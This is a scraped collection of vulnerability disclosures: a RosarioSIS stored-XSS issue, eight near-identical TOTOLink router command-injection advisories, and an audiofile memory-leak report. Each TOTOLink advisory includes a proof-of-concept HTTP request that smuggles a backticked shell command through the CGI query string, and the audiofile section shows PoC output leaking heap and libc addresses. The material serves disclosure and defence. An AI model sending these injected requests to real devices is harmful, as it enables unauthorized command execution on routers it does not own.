A Cross Site Scripting (XSS) vulnerability exists in RosarioSIS before 4.3 via the SanitizeMarkDown function in ProgramFunctions/MarkDownHTML.fnc.php.

Hi @francoisjacquet

I believe to have found a Stored XSS Vulnerability in RosarioSIS. I decided not to go into any specifics here (yet). I would appreciate it if you could get back to me with your preferred way of talking about this, because I couldn't find any information on how to talk about security related issues.

For completeness' sake:

*   The RosarioSIS version is the latest one (commit 6549919d)
*   PHP version: 7.2.13
*   PostgreSQL version: 10.6
*   Server: Apache 2.4.29 (Ubuntu)
*   Browser: Mozilla Firefox 64.0 (Ubuntu)

Regards

To upload designs, you'll need to enable LFS and have an admin enable hashed storage. More information

CVE-2021-44566: Stored XSS Vulnerability (#259) · Issues · François Jacquet / rosariosis

TOTOLink A3000RU V5.9c.2280_B20180512 was discovered to contain a command injection vulnerability in the "Main" function. This vulnerability allows attackers to execute arbitrary commands via the QUERY_STRING parameter.

Permalink

**TOTOLink A3000RU V5.9c.2280\_B20180512 Has an command injection vulnerability****Overview**

*   **Type**: command injection vulnerability
*   **Vendor**: TOTOLINK (https://www.totolink.net/)
*   **Products**: WiFi Router, such as A3000RU V5.9c.2280\_B20180512
*   \*\*Firmware download address:\*\*https://www.totolink.net/home/menu/detail/menu\_listtpl/download/id/168/ids/36.html

**Description****1.Product Information:**

TOTOLink A3000RU V5.9c.2280\_B20180512 router, the latest version of simulation overview：

![Figure 1 Update date of the latest version of the firmware](https://github.com/EPhaha/IOT_vuln/raw/main/TOTOLink/A3000RU/images/image-20220213001948116.png)

**2\. Vulnerability details**

![image-20220213002423745](https://github.com/EPhaha/IOT_vuln/raw/main/TOTOLink/A3000RU/images/image-20220213002423745.png)

TOTOLink A3000RU V5.9c.2280\_B20180512 was discovered to contain a command injection vulnerability in the "Main" function. This vulnerability allows attackers to execute arbitrary commands via the QUERY\_STRING parameter.

![Figure 2 Local of the vulnerability](https://github.com/EPhaha/IOT_vuln/raw/main/TOTOLink/A3000RU/images/image-20220212024252932.png)

We can see that the os will get `QUERY_STRING` without filter splice to the string `echo QUERY_STRING:%s >/tmp/download` and execute it. So, If we can control the `QUERY_STRING`, it can be command injection.

**3\. Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    GET /cgi-bin/downloadFlile.cgi?payload=`ls>../1.txt` HTTP/1.1 
    Host: 192.168.111.12 
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0 
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 
    Accept-Encoding: gzip, deflate 
    Connection: keep-alive 
    Upgrade-Insecure-Requests: 1 
    Cache-Control: max-age=0
    

![Figure 3 POC attack effect](https://github.com/EPhaha/IOT_vuln/raw/main/TOTOLink/A3000RU/images/22.png)

![Figure 4 POC attack effect](https://github.com/EPhaha/IOT_vuln/raw/main/TOTOLink/A3000RU/images/33.png)

CVE-2022-25075: IOT_vuln/README.md at main · EPhaha/IOT_vuln

In autofile Audio File Library 0.3.6, there exists one memory leak vulnerability in printfileinfo, in printinfo.c, which allows an attacker to leak sensitive information via a crafted file. The printfileinfo function calls the copyrightstring function to get data, however, it dosn't use zero bytes to truncate the data.

There exists one Memory-leak bug in printfileinfo, in printinfo.c, which allows an attacker to leak the address of heap or libc via a crafted file.  
To reproduce with the attached poc file:  
poc.zip

Heap address leak:  
./sfinfo ./heapleak\_poc.aiff

Result(See the output of Copyright):

    $ ./sfinfo ./heapleak_poc.aiff
    File Name      ./heapleak_poc.aiff
    File Format    Audio Interchange File Format (aiff)
    Data Format    unknown
    Audio Data     0 bytes begins at offset 0 (0 hex)
                   0 channel, -1 frames
    Sampling Rate  0.00 Hz
    Duration       -inf seconds
    Copyright      C��U
    

Libc address leak:  
./sfinfo ./libleak\_poc.aiff

Result(See the output of Copyright):

    $ ./sfinfo ./libleak_poc.aiff
    File Name      ./libleak_poc.aiff
    File Format    Audio Interchange File Format (aiff)
    Data Format    unknown
    Audio Data     0 bytes begins at offset 0 (0 hex)
                   0 channel, -1 frames
    Sampling Rate  0.00 Hz
    Duration       -inf seconds
    Copyright      Copyright 1991, (d��i
    

**This vulnerability can be triggered anywhere the printfileinfo function is called, for example, sfconvert.**

**The poc.py will help you to calculate the address, which is test on Ubuntu 20.04, python2.**

Usage of poc.py:

    $ python2 poc.py heap
    [+] Starting local process './sfinfo': pid 17868
    [*] Process './sfinfo' stopped with exit code 0 (pid 17868)
    [+] heap_leak:0x55b2425d4243
    [+] heap_base:0x55b2425c2000
    $ python2 poc.py lib
    [+] Starting local process './sfinfo': pid 17920
    [*] Process './sfinfo' stopped with exit code 0 (pid 17920)
    [+] lib_leak:0x7f3d0cbf5428
    [+] libaudiofile_base:0x7f3d0cbc9000
    [+] libc_base:0x7f3d0c9bf000
    

The audiofile project is built with:

    $ ./autogen.sh --disable-docs --prefix=OUTPUT_DIR
    $ make
    $ make install
    

**Descrtption of the Vulnerability:**

**First**, the printfileinfo function calls the copyrightstring function to get data:

    //printfileinfo function, printinfo.c
    bool printfileinfo (const char *filename){
    ...
    char *copyright = copyrightstring(file);
    	if (copyright)
    	{
    		printf("Copyright      %s\n", copyright);
    		free(copyright);
    	}
    ...
    }
    

**Second**, the copyrightstring function obtains copyright information from the file and returns a string pointer:

    //copyrightstring function, printinfo.c
    static char *copyrightstring (AFfilehandle file){
    ...
    int datasize = afGetMiscSize(file, miscids[i]);
    		char *data = (char *) malloc(datasize);
    		afReadMisc(file, miscids[i], data, datasize);
    		copyright = data;
    		break;
    ...
    }
    

**However, it forgets to use memset or zero bytes to prevent the Memory-Leak Vulnerability.  
Most importantly, the attacker can control the length of the memcpy when copying the copyright string, in the afReadMisc function, in Miscellaneous.cpp:**

    //afWriteMisc function, Miscellaneous.cpp
    int afWriteMisc (AFfilehandle file, int miscellaneousid, const void *buf, int bytes)
    {
    ...
    	int localsize = std::min(bytes,
    		miscellaneous->size - miscellaneous->position);
    	memcpy((char *) miscellaneous->buffer + miscellaneous->position,
    		buf, localsize);
    	miscellaneous->position += localsize;
    	return localsize;
    ...
    }
    

**Therefore, any application that uses libaudiofile and calls the printfileinfo function will face the problem of memory leaks.**

CVE-2022-24599: Memory-leak bug in printfileinfo, in printinfo.c · Issue #60 · mpruett/audiofile

TOTOLink A830R V5.9c.4729_B20191112 was discovered to contain a command injection vulnerability in the "Main" function. This vulnerability allows attackers to execute arbitrary commands via the QUERY_STRING parameter.

Permalink

**TOTOLink A830 Has an command injection vulnerability****Overview**

*   **Type**: command injection vulnerability
*   **Vendor**: TOTOLINK (https://www.totolink.net/)
*   **Products**: WiFi Router, such as A830 V5.9c.4729\_B20191112
*   \*\*Firmware download address:\*\*https://www.totolink.net/home/menu/detail/menu\_listtpl/download/id/184/ids/36.html

**Description****1.Product Information:**

TOTOLink A830 V5.9c.4729\_B20191112 router, the latest version of simulation overview：

![Figure 1 Update date of the latest version of the firmware](https://github.com/EPhaha/IOT_vuln/raw/main/TOTOLink/A830R/images/image-20220213003111646.png)

**2\. Vulnerability details**

![image-20220213003615239](https://github.com/EPhaha/IOT_vuln/raw/main/TOTOLink/A830R/images/image-20220213003615239.png)

TOTOLINK A830 V5.9c.4729\_B20191112 was discovered to contain a command injection vulnerability in the "Main" function. This vulnerability allows attackers to execute arbitrary commands via the QUERY\_STRING parameter.

![Figure 2 Local of the vulnerability](https://github.com/EPhaha/IOT_vuln/raw/main/TOTOLink/A830R/images/image-20220212024252932.png)

We can see that the os will get `QUERY_STRING` without filter splice to the string `echo QUERY_STRING:%s >/tmp/download` and execute it. So, If we can control the `QUERY_STRING`, it can be command injection.

**3\. Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    GET /cgi-bin/downloadFlile.cgi?payload=`ls>../1.txt` HTTP/1.1 
    Host: 192.168.111.12 
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0 
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 
    Accept-Encoding: gzip, deflate 
    Connection: keep-alive 
    Upgrade-Insecure-Requests: 1 
    Cache-Control: max-age=0
    

![Figure 3 POC attack effect](https://github.com/EPhaha/IOT_vuln/raw/main/TOTOLink/A830R/images/22.png)

![Figure 4 POC attack effect](https://github.com/EPhaha/IOT_vuln/raw/main/TOTOLink/A830R/images/33.png)

CVE-2022-25080: IOT_vuln/README.md at main · EPhaha/IOT_vuln

TOTOLink A810R V4.1.2cu.5182_B20201026 was discovered to contain a command injection vulnerability in the "Main" function. This vulnerability allows attackers to execute arbitrary commands via the QUERY_STRING parameter.

Permalink

Cannot retrieve contributors at this time

**TOTOLink A810R V4.1.2cu.5182\_B20201026 Has an command injection vulnerability****Overview**

*   **Type**: command injection vulnerability
*   **Vendor**: TOTOLINK (https://www.totolink.net/)
*   **Products**: WiFi Router, such as A810R V4.1.2cu.5182\_B20201026 V5.9c.4050\_B20190424
*   **Firmware download address:** https://www.totolink.net/home/menu/detail/menu\_listtpl/download/id/169/ids/36.html

**Description****1.Product Information:**

TOTOLink A810R V4.1.2cu.5182\_B20201026 router, the latest version of simulation overview：

![Figure 1 Update date of the latest version of the firmware](https://github.com/EPhaha/IOT_vuln/raw/main/TOTOLink/A810R/images/image-20220213004236488.png)

(The latest version on the official website)

**2\. Vulnerability details**

![image-20220213004602767](https://github.com/EPhaha/IOT_vuln/raw/main/TOTOLink/A810R/images/image-20220213004602767.png)

TOTOLINK A810R V4.1.2cu.5182\_B20201026 was discovered to contain a command injection vulnerability in the "Main" function. This vulnerability allows attackers to execute arbitrary commands via the QUERY\_STRING parameter.

![Figure 2 Local of the vulnerability](https://github.com/EPhaha/IOT_vuln/raw/main/TOTOLink/A810R/images/image-20220212024252932.png)

We can see that the os will get `QUERY_STRING` without filter splice to the string `echo QUERY_STRING:%s >/tmp/download` and execute it. So, If we can control the `QUERY_STRING`, it can be command injection.

**3\. Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    GET /cgi-bin/downloadFlile.cgi?payload=`ls>../1.txt` HTTP/1.1 
    Host: 192.168.111.12 
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0 
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 
    Accept-Encoding: gzip, deflate 
    Connection: keep-alive 
    Upgrade-Insecure-Requests: 1 
    Cache-Control: max-age=0
    

![Figure 3 POC attack effect](https://github.com/EPhaha/IOT_vuln/raw/main/TOTOLink/A810R/images/22.png)

![Figure 4 POC attack effect](https://github.com/EPhaha/IOT_vuln/raw/main/TOTOLink/A810R/images/33.png)

CVE-2022-25079: IOT_vuln/README.md at main · EPhaha/IOT_vuln

TOTOLink A3600R V4.1.2cu.5182_B20201102 was discovered to contain a command injection vulnerability in the "Main" function. This vulnerability allows attackers to execute arbitrary commands via the QUERY_STRING parameter.

Permalink

Cannot retrieve contributors at this time

**TOTOLink A3600R V4.1.2cu.5182\_B20201102 Has an command injection vulnerability****Overview**

*   **Type**: command injection vulnerability
*   **Vendor**: TOTOLINK (https://www.totolink.net/)
*   **Products**: WiFi Router, such as A3600R V4.1.2cu.5182\_B20201102
*   **Firmware download address:** http://www.totolink.cn/home/menu/detail.html?menu\_listtpl=download&id=63&ids=36

**Description****1.Product Information:**

TOTOLink A3600R V4.1.2cu.5182\_B20201102 router, the latest version of simulation overview：

![Figure 1 Update date of the latest version of the firmware](https://github.com/EPhaha/IOT_vuln/raw/main/TOTOLink/A3600R/images/image-20220213010829260.png)

**2\. Vulnerability details**

![image-20220213011024726](https://github.com/EPhaha/IOT_vuln/raw/main/TOTOLink/A3600R/images/image-20220213011024726.png)

TOTOLINK A3600R was discovered to contain a command injection vulnerability in the "Main" function. This vulnerability allows attackers to execute arbitrary commands via the QUERY\_STRING parameter.

![Figure 2 Local of the vulnerability](https://github.com/EPhaha/IOT_vuln/raw/main/TOTOLink/A3600R/images/image-20220212024252932.png)

We can see that the os will get `QUERY_STRING` without filter splice to the string `echo QUERY_STRING:%s >/tmp/download` and execute it. So, If we can control the `QUERY_STRING`, it can be command injection.

**3\. Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    GET /cgi-bin/downloadFlile.cgi?payload=`ls>../1.txt` HTTP/1.1 
    Host: 192.168.111.12 
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0 
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 
    Accept-Encoding: gzip, deflate 
    Connection: keep-alive 
    Upgrade-Insecure-Requests: 1 
    Cache-Control: max-age=0
    

![Figure 3 POC attack effect](https://github.com/EPhaha/IOT_vuln/raw/main/TOTOLink/A3600R/images/22.png)

![Figure 4 POC attack effect](https://github.com/EPhaha/IOT_vuln/raw/main/TOTOLink/A3600R/images/33.png)

CVE-2022-25078: IOT_vuln/README.md at main · EPhaha/IOT_vuln

TOTOLink A800R V4.1.2cu.5137_B20200730 was discovered to contain a command injection vulnerability in the "Main" function. This vulnerability allows attackers to execute arbitrary commands via the QUERY_STRING parameter.

Permalink

Cannot retrieve contributors at this time

**TOTOLink A800R V4.1.2cu.5137\_B20200730 Has an command injection vulnerability****Overview**

*   **Type**: command injection vulnerability
*   **Vendor**: TOTOLINK (https://www.totolink.net/)
*   **Products**: WiFi Router, such as A800R V4.1.2cu.5137\_B20200730,V4.1.2cu.5032\_B20200408,V4.1.2cu.5137\_B20200730,V5.9c.4050\_B20190425,V5.9c.681\_B20180413,V5.9c.4245\_B20190726
*   \*\*Firmware download address:\*\*https://www.totolink.net/home/menu/detail/menu\_listtpl/download/id/166/ids/36.html

**Description****1.Product Information:**

TOTOLink A800R router, the latest version of simulation overview：

![Figure 1 Update date of the latest version of the firmware](https://github.com/EPhaha/IOT_vuln/raw/main/TOTOLink/A800R/images/image-20220213003820240.png)

**2\. Vulnerability details**

![image-20220213004048568](https://github.com/EPhaha/IOT_vuln/raw/main/TOTOLink/A800R/images/image-20220213004048568.png)

TOTOLINK A800R V4.1.2cu.5137\_B20200730 was discovered to contain a command injection vulnerability in the "Main" function. This vulnerability allows attackers to execute arbitrary commands via the QUERY\_STRING parameter.

![Figure 2 Local of the vulnerability](https://github.com/EPhaha/IOT_vuln/raw/main/TOTOLink/A800R/images/image-20220212024252932.png)

We can see that the os will get `QUERY_STRING` without filter splice to the string `echo QUERY_STRING:%s >/tmp/download` and execute it. So, If we can control the `QUERY_STRING`, it can be command injection.

**3\. Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    GET /cgi-bin/downloadFlile.cgi?payload=`ls>../1.txt` HTTP/1.1 
    Host: 192.168.111.12 
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0 
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 
    Accept-Encoding: gzip, deflate 
    Connection: keep-alive 
    Upgrade-Insecure-Requests: 1 
    Cache-Control: max-age=0
    

![Figure 3 POC attack effect](https://github.com/EPhaha/IOT_vuln/raw/main/TOTOLink/A800R/images/22.png)

![Figure 4 POC attack effect](https://github.com/EPhaha/IOT_vuln/raw/main/TOTOLink/A800R/images/33.png)

CVE-2022-25076: IOT_vuln/README.md at main · EPhaha/IOT_vuln

TOTOLink A3100R V4.1.2cu.5050_B20200504 was discovered to contain a command injection vulnerability in the "Main" function. This vulnerability allows attackers to execute arbitrary commands via the QUERY_STRING parameter.

Permalink

Cannot retrieve contributors at this time

**TOTOLink A3100R V4.1.2cu.5050\_B20200504 Has an command injection vulnerability****Overview**

*   **Type**: command injection vulnerability
*   **Vendor**: TOTOLINK (https://www.totolink.net/)
*   **Products**: WiFi Router, such as A3100R V4.1.2cu.5050\_B20200504 ，V5.9c.2280\_B20180512，V5.9c.4577\_B20191021，V5.9c.4050\_B20190425，V5.9c.4281\_B20190816，V4.1.2cu.5050\_B20200504，V5.9c.4050\_B20190425\_transition,V4.1.2cu.5050\_B20200504
*   **Firmware download address:** https://www.totolink.net/home/menu/detail/menu\_listtpl/download/id/170/ids/36.html

**Description****1.Product Information:**

TOTOLink A3100R router, the latest version of simulation overview：

![Figure 1 Update date of the latest version of the firmware](https://github.com/EPhaha/IOT_vuln/raw/main/TOTOLink/A3100R/images/image-20220212023224337.png)

The latest firmware update to 2020-07-28 (The latest version on the official website)

**2\. Vulnerability details**

TOTOLINK A3100R V4.1.2cu.5050\_B20200504 was discovered to contain a command injection vulnerability in the "Main" function. This vulnerability allows attackers to execute arbitrary commands via the QUERY\_STRING parameter.

![Figure 2 Local of the vulnerability](https://github.com/EPhaha/IOT_vuln/raw/main/TOTOLink/A3100R/images/image-20220212024252932.png)

We can see that the os will get `QUERY_STRING` without filter splice to the string `echo QUERY_STRING:%s >/tmp/download` and execute it. So, If we can control the `QUERY_STRING`, it can be command injection.

**3\. Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    GET /cgi-bin/downloadFlile.cgi?payload=`ls>../1.txt` HTTP/1.1 
    Host: 192.168.111.12 
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0 
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 
    Accept-Encoding: gzip, deflate 
    Connection: keep-alive 
    Upgrade-Insecure-Requests: 1 
    Cache-Control: max-age=0
    

![Figure 3 POC attack effect](https://github.com/EPhaha/IOT_vuln/raw/main/TOTOLink/A3100R/images/22.png)

as shown in the figure below, there is no web login

![Figure 4 POC attack effect](https://github.com/EPhaha/IOT_vuln/raw/main/TOTOLink/A3100R/images/33.png)

CVE-2022-25077: IOT_vuln/README.md at main · EPhaha/IOT_vuln

TOTOLink T6 V5.9c.4085_B20190428 was discovered to contain a command injection vulnerability in the "Main" function. This vulnerability allows attackers to execute arbitrary commands via the QUERY_STRING parameter.

Permalink

Cannot retrieve contributors at this time

**TOTOLink T6 V5.9c.4085\_B20190428 Has an command injection vulnerability****Overview**

*   **Type**: command injection vulnerability
*   **Vendor**: TOTOLINK (https://www.totolink.net/)
*   **Products**: WiFi Router, such as T6 V5.9c.4085\_B20190428
*   \*\*Firmware download address:\*\*https://www.totolink.net/home/menu/detail/menu\_listtpl/download/id/190/ids/36.html

**Description****1.Product Information:**

TOTOLink T6 V5.9c.4085\_B20190428 router, the latest version of simulation overview：

![Figure 1 Update date of the latest version of the firmware](https://github.com/EPhaha/IOT_vuln/raw/main/TOTOLink/T6/images/image-20220213001350971.png)

**2\. Vulnerability details**

TOTOLink T6 V5.9c.4085\_B20190428 was discovered to contain a command injection vulnerability in the "Main" function. This vulnerability allows attackers to execute arbitrary commands via the QUERY\_STRING parameter.

![Figure 2 Local of the vulnerability](https://github.com/EPhaha/IOT_vuln/raw/main/TOTOLink/T6/images/image-20220212024252932.png)

We can see that the os will get `QUERY_STRING` without filter splice to the string `echo QUERY_STRING:%s >/tmp/download` and execute it. So, If we can control the `QUERY_STRING`, it can be command injection.

**3\. Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    GET /cgi-bin/downloadFlile.cgi?payload=`ls>../1.txt` HTTP/1.1 
    Host: 192.168.111.12 
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0 
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 
    Accept-Encoding: gzip, deflate 
    Connection: keep-alive 
    Upgrade-Insecure-Requests: 1 
    Cache-Control: max-age=0
    

![Figure 3 POC attack effect](https://github.com/EPhaha/IOT_vuln/raw/main/TOTOLink/T6/images/22.png)

![Figure 4 POC attack effect](https://github.com/EPhaha/IOT_vuln/raw/main/TOTOLink/T6/images/33.png)

CVE-2022-25084: IOT_vuln/README.md at main · EPhaha/IOT_vuln

TOTOLink T10 V5.9c.5061_B20200511 was discovered to contain a command injection vulnerability in the "Main" function. This vulnerability allows attackers to execute arbitrary commands via the QUERY_STRING parameter.

Permalink

Cannot retrieve contributors at this time

**TOTOLink T10 V5.9c.5061\_B20200511 Has an command injection vulnerability****Overview**

*   **Type**: command injection vulnerability
*   **Vendor**: TOTOLINK (https://www.totolink.net/)
*   **Products**: WiFi Router, such as T10 V5.9c.5061\_B20200511
*   **Firmware download address:** https://www.totolink.net/home/menu/detail/menu\_listtpl/download/id/172/ids/36.html

**Description****1.Product Information:**

TOTOLink T10 router, the latest version of simulation overview：

![Figure 1 Update date of the latest version of the firmware](https://github.com/EPhaha/IOT_vuln/raw/main/TOTOLink/T10/images/image-20220212234850675.png)

**2\. Vulnerability details**

![Figure 2 Local of file](https://github.com/EPhaha/IOT_vuln/raw/main/TOTOLink/T10/images/image-20220212235410138.png)

TOTOLink T10 V5.9c.5061\_B20200511 was discovered to contain a command injection vulnerability in the "Main" function. This vulnerability allows attackers to execute arbitrary commands via the QUERY\_STRING parameter.

![Figure 3 Local of the vulnerability](https://github.com/EPhaha/IOT_vuln/raw/main/TOTOLink/T10/images/image-20220212235159394.png)

We can see that the os will get `QUERY_STRING` without filter splice to the string `echo QUERY_STRING:%s >/tmp/download` and execute it. So, If we can control the `QUERY_STRING`, it can be command injection.

**3\. Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    GET /cgi-bin/downloadFlile.cgi?payload=`ls>../1.txt` HTTP/1.1 
    Host: 192.168.111.12 
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0 
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 
    Accept-Encoding: gzip, deflate 
    Connection: keep-alive 
    Upgrade-Insecure-Requests: 1 
    Cache-Control: max-age=0
    

![Figure 4 POC attack effect](https://github.com/EPhaha/IOT_vuln/raw/main/TOTOLink/T10/images/22.png)

However response code is 500, the code is still executed successfully

![Figure 5 POC attack effect](https://github.com/EPhaha/IOT_vuln/raw/main/TOTOLink/T10/images/33.png)

Tag

#ubuntu